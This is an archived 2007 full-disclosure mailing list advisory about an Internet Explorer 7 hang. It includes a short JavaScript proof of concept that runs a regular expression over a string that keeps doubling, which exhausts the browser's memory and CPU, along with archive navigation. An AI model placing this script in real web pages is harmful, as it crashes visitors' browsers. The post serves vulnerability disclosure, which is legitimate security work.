Internet Explorer Crash

From: "J. Oquendo" <sil@xxxxxxxxxxxxxxx>
Date: Tue, 17 Apr 2007 13:09:13 -0400

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Product: Internet Explorer Version 7.0.5730.11
Impact: Browser crash possibly more
Author: Jesus Oquendo
echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'

I. BACKGROUND
Why bother? Who doesn't know what Internet Explorer and Microsoft are.

II. DESCRIPTION
IE 7 is vulnerable to a script which causes the browser to hang. The
memory and CPU usage go through the roof. Originally the script caused
(and still causes) Safari and Konqueror to crash.

III SOLUTION
Stop using Microsoft products or deal with a new advisory every other
day.

IV. Proof
http://www.infiltrated.net/stupidInternetExploder.html

V. Code

$ more /stupidInternetExploder.html

<script>

var reg = /(.)*/;

var z = 'Z';
while (z.length <= 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999) z+=z;
var boum = reg.exec(z);

</script>

Goodbye

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net

The happiness of society is the end of government.
John Adams

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (FreeBSD)

iD8DBQFGJQGJh3J3NhODp0MRArt5AKCVI+A0rHdYMOz9KYIbCxFkMN8QcgCbBBBC
TCV7FOqA05H8sSDb0r8nSnk=
=J/DW
-----END PGP SIGNATURE-----

Attachment: smime.p7s
Description: S/MIME Cryptographic Signature

Follow-Ups:
- Re: Internet Explorer Crash
  - From: The Anarcat

Prev by Date: Re: bloofoxCMS 0.2.2 Remote File Include Vulnerabilitiy
Next by Date: [security bulletin] HPSBTU02207 SSRT061213, SSRT061239, SSRT071304 rev.1 - HP Tru64 UNIX SSL and BIND Remote Arbitrary Code Execution or Denial of Service (DoS)
Previous by thread: webMethods Security Advisory: Glue console directory traversal vu lnerability
Next by thread: Re: Internet Explorer Crash
Index(es):
- Date
- Thread

Relevant Pages

[Full-disclosure] Internet Explorer Crash
... Impact: Browser crash possibly more ... Who doesn't know what Internet Explorer and Microsoft are. ... IE 7 is vulnerable to a script which causes the browser to hang. ...
(Full-Disclosure)
Re: IE Script Error
... After running the 4/11/06 Windows updates from Microsoft I can no ... longer use my Canon Easy-Webprint for Internet Explorer. ... An error has occurred in the script on this page. ...
(microsoft.public.windows.inetexplorer.ie6.browser)
Script error messages
... Amy time I'm on Internet Explorer I keep getting script ... error messages. ... HP says that it is in the microsoft ...
(microsoft.public.windows.inetexplorer.ie6.ieak)
Re: Probable spyware problem
... > when i open the internet explorer, and is causing the google, yahoo ... Microsoft has these suggestions for Protecting your computer from the ... keep it clean,secure and running at its top performance mark. ... I'll mainly work around Windows XP, as that is what the bulk of this ...
(microsoft.public.windowsxp.security_admin)
Re: OWA slow for users to pull up
... Please open the ISA Server management console, ... In the right pane, switch to the 'Logging' tab, make sure the 'Task ... 'Microsoft Firewall' service. ... Open Internet Explorer ...
(microsoft.public.windows.server.sbs)